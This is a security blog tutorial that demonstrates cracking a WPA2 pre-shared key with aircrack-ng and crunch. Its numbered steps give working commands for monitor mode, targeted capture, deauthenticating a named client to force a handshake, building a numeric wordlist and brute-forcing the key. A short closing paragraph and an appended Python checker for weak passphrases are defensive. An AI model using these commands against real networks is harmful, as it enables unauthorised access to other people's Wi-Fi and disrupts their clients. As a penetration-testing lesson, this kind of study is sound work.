SBM Labs

Cyber Security Collaboration Project

Wi-Fi Attack. WPA2 Pre-Shared Key Cracking.
12 Jun 2016

In this article we will study how an attacker can gain access to a Wi-Fi access point protected with a WPA2 pre-shared key (PSK). We will use the Kali Linux distribution and penetration testing tools such as aircrack-ng and crunch.

1. Identify the wireless network interface.

# iwconfig

2. Put the wireless card into monitor mode.

# airmon-ng start wlan0

3. Check compatibility with aircrack-ng.

You can find information about the compatibility of wireless chipsets and drivers with aircrack-ng here.

4. Start a wireless packet capture.

# airodump-ng wlan0mon

We will crack this AP (ESSID) for demonstration purposes. Its MAC address (BSSID) is AA:53:95:B8:89:C7 and it uses channel 1.

5. Capture and save the traffic of the chosen Wi-Fi access point.

# airodump-ng --bssid AA:53:95:B8:89:C7 -c 1 --write AP wlan0mon

6. Deauthenticate the client.

We need to deauthenticate the client in order to capture the 4-way handshake when it reconnects. The client's MAC address is 00:26:5E:81:29:8A.

# aireplay-ng -0 1 -a AA:53:95:B8:89:C7 -c 00:26:5E:81:29:8A wlan0mon

In some cases you get the message "Couldn't determine current channel for wlan0mon, you should either force the operation with --ignore-negative-one or apply a kernel patch". As a result, your attempt to deauthenticate the client may fail. I met this problem while testing aircrack-ng in an Ubuntu Desktop environment.

Our attempt was successful, so we can see "WPA handshake: AA:53:95:B8:89:C7" in the top right corner of the airodump-ng output (Step 5).

Let's check the captured packets with Wireshark. Apply "eapol" as the display filter in order to see the 4-way handshake.

7. Prepare a wordlist dictionary.

We assume that the PSK of the AP (ESSID) is an eight-digit number. We will use the password generator crunch to prepare the dictionary.

# crunch 8 8 0123456789 -o number_password.list

8. Run the PSK attack.

# aircrack-ng AP-01.cap -w number_password.list

You should use a strong PSK in order to protect access to a Wi-Fi access point: the eight-digit numeric key assumed in Step 7 has only 10^8 candidates, which is why a wordlist built with crunch is enough to exhaust it.
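To put that advice in numbers, here is an added Python example (not part of the original article) that sizes the search space a dictionary attack like Step 8 has to exhaust and rejects passphrases of the kind assumed in Step 7. The guess rate of 100,000 per second and the 100-year threshold are constructed assumptions, not measurements.

```python
"""Size the WPA2 passphrase search space and flag weak pre-shared keys.

The guess rate and the acceptance threshold below are constructed
assumptions for illustration; they are not measured cracking speeds.
"""
import string

# WPA2-PSK passphrases are 8 to 63 printable ASCII characters (IEEE 802.11i).
MIN_PSK_LEN = 8
MAX_PSK_LEN = 63

# Ordered from smallest to largest so the first match is the tightest class.
CHARSETS = {
    "digits": string.digits,
    "lower": string.ascii_lowercase,
    "alnum": string.ascii_letters + string.digits,
    "printable": string.ascii_letters + string.digits + string.punctuation + " ",
}


def keyspace(charset: str, length: int) -> int:
    """Number of distinct passphrases of exactly `length` drawn from `charset`."""
    return len(set(charset)) ** length


def seconds_to_exhaust(space: int, guesses_per_second: float) -> float:
    """Time to try every candidate once at the assumed guess rate."""
    return space / guesses_per_second


def describe_charset(psk: str) -> str:
    """Smallest named character class covering every character of `psk`."""
    for name, chars in CHARSETS.items():
        if all(c in chars for c in psk):
            return name
    return "other"


def check_psk(psk: str, guesses_per_second: float = 1e5, min_years: float = 100.0):
    """Return (ok, reason). A passphrase passes only if it is a valid WPA2
    length and exhausting its character class would take at least `min_years`."""
    if not MIN_PSK_LEN <= len(psk) <= MAX_PSK_LEN:
        return False, f"WPA2 passphrases must be {MIN_PSK_LEN}-{MAX_PSK_LEN} characters"
    cls = describe_charset(psk)
    if cls == "other":
        return False, "only printable ASCII characters are allowed"
    years = seconds_to_exhaust(keyspace(CHARSETS[cls], len(psk)), guesses_per_second)
    years /= 365 * 24 * 3600
    reason = f"{cls} passphrase of length {len(psk)}: ~{years:.2g} years to exhaust"
    return years >= min_years, reason


if __name__ == "__main__":
    for candidate in ("12345678", "correcthorse", "Tr0ub4dor&3xample!"):
        print(candidate, check_psk(candidate))
```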